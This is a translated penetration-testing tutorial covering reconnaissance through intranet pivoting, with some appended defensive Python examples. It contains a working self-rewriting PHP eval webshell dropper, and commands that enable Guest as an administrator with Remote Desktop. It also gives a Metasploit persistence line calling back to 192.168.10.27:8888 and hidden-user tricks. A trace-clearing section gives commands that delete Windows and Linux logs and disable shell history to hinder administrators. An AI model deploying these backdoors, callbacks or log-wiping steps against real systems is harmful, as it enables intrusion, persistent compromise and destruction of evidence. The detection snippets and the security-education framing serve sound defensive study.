1. Determine the target
Penetration testing is divided into white box testing and black box testing:
- White box testing: the target website is tested with knowledge of its source code and other internal information, so it resembles code auditing.
- Black box testing: the tester is given only the URL of the website and nothing else, simulating how an outside attacker would approach the site.
In black box testing, we know only the URL of the website.
Generally speaking, the basic process of penetration testing is as follows:
- Determine the target
- Information collection
- Vulnerability detection
- Exploitation (getshell)
- Intranet forwarding
- Intranet penetration
- Trace clearing
- Write a penetration test report
2. Information collection
1. Host scan
Nmap: A powerful network scanning and host detection tool that can be used for information gathering, enumeration, vulnerability detection and security scanning.
Wireshark: A tool for capturing packets and analyzing network traffic, which can be used to monitor and debug network communication.
Goby: A newer vulnerability scanning platform that can quickly discover and exploit various vulnerabilities, and can be integrated with other tools such as Xray and MSF.
2. Port scanning
22 -> SSH (weak passwords)
80 -> HTTP service
873 -> rsync (unauthenticated access vulnerability)
3306 -> MySQL (weak passwords)
6379 -> Redis (unauthenticated access vulnerability)
Port scanning tools include nmap and nikto.
In Kali, a few commands show whether a port is open, for example:
netstat -lnt: list the TCP ports currently listening on the Kali host itself.
lsof -i: list the processes holding open network sockets, i.e. the open ports, directly.
nmap: scan for open ports on the target host.
3. Website sensitive directories and files
Tools for discovering the admin backend directory of the target website include wwwscan, Yujian (御剑) and dirsearch.
Scan the website's directory structure to see whether directories can be listed or sensitive files are exposed:
- Admin backend directory: weak passwords, universal (bypass) passwords, brute forcing
- Installation package: yields database information, or even the website source code
- Upload directory: truncation tricks, image uploads, etc.
- MySQL management interface: weak passwords, brute forcing, universal passwords, then dumping the database or even getting a shell
- Installation page: may allow a second installation to bypass protections
- phpinfo: exposes all kinds of configuration details
- Editors: FCKeditor (fck), ke, etc.
- IIS short file name enumeration: the conditions are fairly demanding (Windows, Apache, etc.)
robots.txt file
Lists the directories of the website that crawlers are asked not to visit, so that part or all of the site is not indexed by search engines, or only the specified content is. Because it names exactly the paths the owner did not want found, it is worth reading during directory discovery.
4. Side station and C-segment scanning
Side-site and C-segment scanning are two information-collection methods for finding other websites or servers, related to the target website or server, that may have vulnerabilities.
Side sites are other websites hosted on the same server as the target website. If the target website itself has no vulnerabilities, one can first attack a side site, escalate privileges to gain control of the server, and then reach the target website from there. Commonly used side-site query tools include Yujian (御剑) and bing.com.
The C segment means the other servers in the same /24 as the target server's IP. For example, if the target server's IP is 192.168.1.100, its C segment is 192.168.1.*. Hosts found in the C segment can be used as a springboard to attack the target host. Commonly used C-segment scanning tools include Nmap and Masscan.
5. Website vulnerability scanning
Website vulnerability scanning is a method of detecting whether a website has security vulnerabilities. It can detect vulnerabilities by sending payloads, or perform aggressive vulnerability scanning by simulating attackers' methods. Commonly used website vulnerability scanning tools include Acunetix Web Vulnerability Scanner (AWVS), Nikto, Nmap, etc.
6. Website Fingerprinting
Website fingerprinting, in this context, means identifying the technology a target website runs (CMS, web server, development language) from observable traits. It can be done in the following ways: the MD5 of a specific file, keywords contained in normal or error pages, keyword matching on response header information, keywords contained in certain URLs, identification of the development language, etc. Commonly used website fingerprinting tools include ZoomEye, WhatWeb, etc.
7. Online collection of company sensitive information
8. Collection of domain name information
Domain name information collection means obtaining the target's domain name, subdomains, IP addresses and related information through various methods, for use in later stages of the penetration test. There are several ways to collect domain name information:
Brute forcing: use tools such as dnsmap to run dictionary attacks against the target domain and discover subdomains.
Search engines: use tools such as theHarvester, or enter relevant keywords into a search engine directly, and use the search engine's index to find subdomains.
Zone transfer: use tools such as fierce or dig to request a DNS zone transfer for the target domain. If the target's DNS server is misconfigured, all of its subdomains may be leaked.
Whois query: use whois websites or the whois tool to look up the target domain and obtain the registrant, registrar, registration time and similar details.
Determining the IP behind the domain: first check whether the domain sits behind a CDN, using online multi-location ping or website speed-test services (e.g. webmaster tools). If the query returns more than one IP, the returned address is not the real server address. From my experience, if there are 2 or 3 addresses belonging to different operators in the same area, these are very likely the server's egress addresses: Internet access is provided through NAT mappings from several operators at once, for load balancing and hot standby. If there are many IP addresses spread across different regions, it can basically be concluded that a CDN is in use.
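As an added example (not part of the original article), the heuristic above carried through in Python: it groups resolution results from several vantage points by returned IP and applies the author's decision rule. The sample results, the operator and region labels, and the verdict names are constructed for this example and assumed to come from whatever multi-location ping service was used.

```python
from collections import defaultdict

# Constructed results from a multi-location ping / speed-test service, as
# (vantage point, operator the resolved IP belongs to, region, resolved IP).
# Not real measurements; addresses come from documentation ranges.
SINGLE_ORIGIN = [
    ("Beijing", "China Telecom", "North", "203.0.113.10"),
    ("Shanghai", "China Unicom", "East", "203.0.113.10"),
    ("Guangzhou", "China Mobile", "South", "203.0.113.10"),
]
MULTI_HOMED = [  # 2-3 IPs, different operators, same area
    ("Hangzhou", "China Telecom", "East", "198.51.100.7"),
    ("Hangzhou", "China Unicom", "East", "198.51.100.9"),
    ("Nanjing", "China Telecom", "East", "198.51.100.7"),
]
BEHIND_CDN = [  # many IPs spread over different regions
    ("Beijing", "China Telecom", "North", "192.0.2.11"),
    ("Shanghai", "China Unicom", "East", "192.0.2.22"),
    ("Guangzhou", "China Mobile", "South", "192.0.2.33"),
    ("Chengdu", "China Telecom", "West", "192.0.2.44"),
]

def classify_resolution(results):
    """Apply the article's rule: one IP -> probably the real server;
    2-3 IPs from different operators in one area -> NAT egress addresses;
    many IPs in different regions -> a CDN is in front."""
    by_ip = defaultdict(lambda: {"operators": set(), "regions": set()})
    for _vantage, operator, region, ip in results:
        by_ip[ip]["operators"].add(operator)
        by_ip[ip]["regions"].add(region)
    if not by_ip:
        return "no-data"
    if len(by_ip) == 1:
        return "single-origin"
    regions = {r for v in by_ip.values() for r in v["regions"]}
    operators = {o for v in by_ip.values() for o in v["operators"]}
    if len(by_ip) <= 3 and len(regions) == 1 and len(operators) > 1:
        return "multi-homed-egress"
    if len(regions) > 1:
        return "cdn"
    # several IPs, one region, one operator: needs more vantage points
    return "unclear"
```

A site owner can run the same check against their own domain: a "single-origin" verdict means the origin address is directly exposed.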
3. Vulnerability detection
- SQL injection
- XSS (cross-site scripting)
- CSRF (cross-site request forgery)
- XXE vulnerability
- SSRF (server-side request forgery) vulnerability
- File inclusion vulnerability
- File upload vulnerability
- File parsing vulnerabilities
- Remote code execution vulnerabilities
- CORS (cross-origin resource sharing) vulnerability
- Unauthorized access vulnerability
- Directory browsing and arbitrary file read/download vulnerabilities
- Struts2 vulnerabilities
- Java deserialization vulnerability
Website Vulnerability Scanning Tool
- AWVS
- AppScan
- Owasp-Zap
- Nessus
4. Exploitation
Different vulnerabilities call for different exploitation tools. In many cases a single vulnerability is not enough to obtain a webshell on a website; several vulnerabilities often have to be chained to get there. Commonly used exploitation tools are as follows:
SQL injection --> sqlmap
XSS cross-site scripting --> BeEF-XSS
Packet capture --> Burp Suite, Fiddler
File upload vulnerability --> if an upload vulnerability exists, we usually upload a one-sentence Trojan (a one-line webshell) and then obtain a webshell; see: Webshell and one-sentence Trojan horse
However, the privileges that come with a webshell are usually very low, so we need to escalate privileges:
- Reverse an MSF-type shell and escalate from it: use of the Metasploit Framework (MSF); msfvenom generates the backdoor Trojan.
- Reverse a Cobalt Strike-type shell: use of the penetration testing tool Cobalt Strike.
- Link MSF and Cobalt Strike: MSF and Cobalt Strike linkage. Other privilege escalation techniques also apply: Windows privilege escalation, Linux privilege escalation.
5. Intranet forwarding
If we have obtained control of the website through the webshell and want further information about the host, we can replace the webshell with an MSF shell: generate a Trojan and execute it through the webshell client (China Chopper, 菜刀) to get an MSF-type shell. If we want to probe other hosts on the intranet, we need intranet forwarding: because we cannot talk to intranet hosts directly, we go through the compromised web server to interact with them.
6. Intranet lateral movement
After taking over the external-facing server and getting into the system, we should try hard to find useful information on the server.
On Windows, look through folders; there may be unexpected finds. Many people are used to keeping easily forgotten things such as account passwords in Notepad files or on the desktop. We can also look for database connection files to find sensitive information such as database credentials.
Once we have an account password for the Windows system, or have created a user ourselves, we try not to log in via Remote Desktop, so as not to be noticed by the administrator and not to affect normal operation of the server. Remote Desktop is too noisy: if the administrator is also logged in, an RDP login would push them out, and we would soon be kicked off by the administrator. Where an RDP login is really necessary, we try not to create a new user to log in with.
We can activate the guest user, add it to the administrators group, and log in as guest. After an RDP login we can see what software is on other users' desktops and in other folders. The targets we are looking for include the following.
1. FTP-related software and database-related software; open the browser to check its history and whether user passwords are saved, and use tools to read the browser's saved passwords. Use the account passwords found on the host to build a dictionary for brute forcing other machines on the intranet, since they may well share the same set of passwords.
net user guest /active:yes #activate the guest user
net localgroup administrators guest /add #add the guest user to the administrators group
net user guest <password> #change the guest user's password
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f #enable Remote Desktop (port 3389)
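From the defender's side, the three commands above leave a distinctive trail in the Windows logs, which the following added example (not part of the original article) correlates per host: Security event 4722 (account enabled) and 4732 (member added to a local group) for Guest, plus a Sysmon event 13 (registry value set) on fDenyTSConnections. The log lines are constructed and rendered in a simplified key=value form; the field names are assumptions for this example, not the exact Windows event XML schema.

```python
import re
from collections import defaultdict

# Constructed sample events (not real logs) in a simplified key=value form.
# Security EventID 4722 = user account enabled, 4732 = member added to a
# security-enabled local group; Sysmon EventID 13 = registry value set.
SAMPLE_LOG = r"""
EventID=4722 Computer=web01 TargetUserName=Guest
EventID=4732 Computer=web01 MemberName=Guest TargetUserName=Administrators
EventID=13 Computer=web01 TargetObject=HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections Details=DWORD (0x00000000)
EventID=4732 Computer=db02 MemberName=backup_svc TargetUserName=Backup Operators
EventID=4722 Computer=db02 TargetUserName=Guest
"""

# key=value pairs whose values may contain spaces (a value ends at the next " key=")
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")
STEPS = ("guest_enabled", "guest_in_administrators", "rdp_enabled_via_registry")

def parse_line(line):
    """Turn one key=value log line into a dict."""
    return dict(FIELD_RE.findall(line.strip()))

def classify(event):
    """Map one parsed event to the takeover step it represents, or None."""
    eid = event.get("EventID")
    if eid == "4722" and event.get("TargetUserName", "").lower() == "guest":
        return "guest_enabled"
    if (eid == "4732" and event.get("MemberName", "").lower() == "guest"
            and event.get("TargetUserName", "").lower() == "administrators"):
        return "guest_in_administrators"
    if (eid == "13"
            and event.get("TargetObject", "").lower().endswith(r"terminal server\fdenytsconnections")
            and "0x00000000" in event.get("Details", "")):
        return "rdp_enabled_via_registry"
    return None

def find_guest_rdp_takeover(log_text):
    """Return {host: [steps]} for hosts on which all three steps were seen."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        step = classify(event)
        if step:
            seen[event.get("Computer", "?")].add(step)
    return {host: sorted(s) for host, s in seen.items() if len(s) == len(STEPS)}
```

Only web01 shows the complete sequence; db02 has Guest enabled but not added to Administrators, so it is not reported, although a single 4722 for Guest is itself worth alerting on.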
On Linux systems, we can look at open ports, running services and connections to intranet hosts, browse folders, find database connection passwords, and so on. In short, collect as many account passwords as possible; they are very useful when brute forcing on the intranet. After establishing a tunnel into the intranet, the first thing to do is asset discovery. Judging which intranet segments are live is a big problem: 10.0.0.0/8, 172.16.0.0/16 and 192.168.0.0/24 may all exist in the intranet at the same time, so a scanner is needed. When scanning through a proxy, nmap is not recommended.
If you scan through the proxy from your own machine with a graphical tool, RouterScan, the Yujian high-speed TCP full-port scanner and IIS_Scanner can be used, but lower the thread count to avoid crashing the proxy.
If you use a command-line scanner, the S scanner can be used. After the intranet assets and open ports have been scanned, port 445 can be tested for MS17-010, but note that 445 has to be reached through the proxy, which differs from the earlier steps; see: MS17-010 in intranet penetration. Port 3389 can be tested for CVE-2019-0708; see: reproducing the CVE-2019-0708 Remote Desktop vulnerability. Ports such as 1433/3306/6379 can be brute forced, and the success rate is higher when using the account passwords collected earlier.
Persistence (maintaining access)
After obtaining access to the target host, it is quite likely that we cannot immediately get what we want, and a long period of dormancy is needed, especially in intranet penetration, which requires long-term information collection. Persistence is therefore very important: we need to keep the access we already have.
Web backdoor
1: Hide the backdoor file (set the file attribute to hidden)
2: Undead horse: a script that recreates test.php on the server every 5 seconds and writes a one-line webshell into it, so that the Trojan survives removal. Combined with the attrib command to hide the file, it makes a more durable backdoor.
<?php
set_time_limit(0);      // no limit on script execution time
ignore_user_abort(1);   // keep running after the client disconnects
unlink(__FILE__);       // delete this script itself from disk
while(1){
    file_put_contents('test.php','<?php $a=array($_REQUEST["x"]=>"3");
$b=array_keys($a)[0];
eval($b);?>');
    sleep(5);
}
?>
3: Hide the backdoor in the 404 page, or insert the backdoor code into other existing files of the site
Note: all of the above backdoor methods can be detected by tools such as D-Shield
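The note above says these backdoors are caught by tools such as D-Shield. As an added example (not the article's code and not D-Shield's signatures), here is a small Python scanner that flags the undead-horse dropper and the one-liner it writes from static indicators. The samples, indicator names, weights and threshold are constructed for this example.

```python
import re

# Static indicators for the "undead horse" dropper and the one-liner it writes:
# (name, regex, weight). Names and weights are this example's own choice.
INDICATORS = [
    ("eval_of_variable", r"\beval\s*\(\s*\$", 4),
    ("request_data_as_array_key", r"array\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\s*\[", 3),
    ("array_keys_into_eval", r"array_keys\s*\(.*?\beval\s*\(", 2),
    ("ignore_user_abort", r"ignore_user_abort\s*\(\s*(1|true)\s*\)", 2),
    ("no_time_limit", r"set_time_limit\s*\(\s*0\s*\)", 1),
    ("self_delete", r"unlink\s*\(\s*__FILE__\s*\)", 3),
    ("infinite_rewrite_loop",
     r"while\s*\(\s*(1|true)\s*\).*?file_put_contents\s*\(.*?sleep\s*\(", 4),
]

# Constructed samples: the dropper pattern shown above, the file it drops,
# and a benign cache writer that also calls file_put_contents.
DROPPER = r"""<?php
set_time_limit(0); ignore_user_abort(1); unlink(__FILE__);
while(1){ file_put_contents('test.php','<?php $a=array($_REQUEST["x"]=>"3");$b=array_keys($a)[0];eval($b);?>'); sleep(5); }
?>"""
DROPPED_SHELL = '<?php $a=array($_REQUEST["x"]=>"3"); $b=array_keys($a)[0]; eval($b); ?>'
BENIGN = """<?php
$data = json_encode(["generated" => time()]);
file_put_contents(__DIR__ . "/cache.json", $data);
?>"""

def scan_php(source):
    """Return (score, [matched indicator names]) for one PHP source string."""
    hits = [name for name, pattern, _ in INDICATORS if re.search(pattern, source, re.S)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits

def verdict(source, threshold=5):
    """Classify a PHP file as undead-dropper, webshell, suspicious or clean."""
    score, hits = scan_php(source)
    if {"self_delete", "infinite_rewrite_loop"} <= set(hits):
        return "undead-dropper"   # rewrites its payload every few seconds
    if "eval_of_variable" in hits and "request_data_as_array_key" in hits:
        return "webshell"         # executes whatever the request supplies
    return "suspicious" if score >= threshold else "clean"
```

Because the dropper deletes itself after starting, a disk scan may only ever find the dropped test.php; the running PHP process that keeps rewriting it has to be found through process inspection.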
Windows system
1: Create a hidden user by appending $ to the user name
2: Place the Trojan file in the startup directory; whenever the target machine restarts, it connects back to our remote control
3: The persistence module in MSF; running it makes the target machine automatically connect back to the remote control at regular intervals, but it is easy to spot
# The callback interval is 5 s; it connects back to port 8888 on 192.168.10.27. The drawback is that antivirus software easily detects and removes it
run persistence -X -i 5 -p 8888 -r 192.168.10.27
# It then creates this file on the target: C:\Windows\TEMP\CJzhFlNOWa.vbs, and registers it in the registry so that it starts at every boot
4: In a domain environment, find a way to obtain the hash of the krbtgt account, which can be used for pass-the-ticket attacks; this account's password is generally not changed often.
5: Shift (sticky keys) backdoor
6: Remote Desktop session hijacking
Linux system
1: SSH backdoor
2: crontab timing task
3: SSH public key
4: Create a user with UID 0
7. Trace clearing
When we have achieved our goal, sometimes it is just to hack the website and hang a defacement page to show off; or to leave a backdoor on the website, keep it as a bot, and drop by when we are free; or to plant a mining Trojan. But nobody should do this: it is illegal!
I am only here to teach you how to remove some of the traces we leave behind after a penetration, and they cannot be removed completely. It is impossible to remove intrusion traces completely! The main point is to raise the time and labor cost for the administrator to find the intruder. As long as the administrator wants to investigate, no matter how you clean up, it can still be found.
The most important thing is to hide your identity. The best approach is to go through a proxy before the penetration, and then clear traces after it.
Windows system
1: On a Windows system, the clearev command in MSF (Meterpreter) can be used to clear the event logs
2: If you logged in remotely over 3389, the mstsc traces also need to be cleared
3: Execute the following command to clear log files:
del %WINDIR%\*.log /a/s/q/f
4: For a web application, find the web server's log files and delete them
Linux system
1: On a Linux system, after obtaining access, run the following commands; subsequent commands will not be recorded in the shell history
export HISTFILE=/dev/null
export HISTSIZE=0
2: Delete the log files under /var/log
3: For a web application, find the web server's log files and delete them
8. Writing a penetration testing report
After completing the penetration test, we need to write a penetration test report for it: state clearly where the vulnerabilities are and how to fix them, so that the site owners can patch these vulnerabilities and risks based on our report.